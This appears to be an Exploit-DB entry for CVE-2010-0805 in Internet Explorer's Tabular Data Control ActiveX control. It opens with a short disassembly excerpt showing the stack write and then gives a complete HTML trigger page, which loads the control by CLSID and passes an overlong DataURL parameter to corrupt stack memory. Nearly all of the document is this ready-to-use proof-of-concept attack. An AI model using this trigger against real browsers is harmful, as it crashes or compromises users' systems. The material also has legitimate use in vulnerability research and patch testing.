Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution

EDB-ID:

12032


Type:

dos


Platform:

Windows

Date:

2010-04-03


# CVE : CVE-2010-0805


<!--
.text:600058F7                 and     [ebp+pv], 0
.text:600058FE                 lea     eax, [ebp+pv]
.text:60005904                 push    eax             ; unsigned __int16 **
.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *
.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)
.text:6000590D                 mov     eax, [ebp+var_218]
.text:60005913                 push    [ebp+pv]        ; pv
.text:60005919                 mov     [ebp+eax+var_204], 0
.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param
.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address
-->
<html>
<title>Trigger for ZDI-10-034 by ZSploit.com</title>
<head>
</head>
<body>
<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>
</object>
</body>
</html>


The ZSploit Team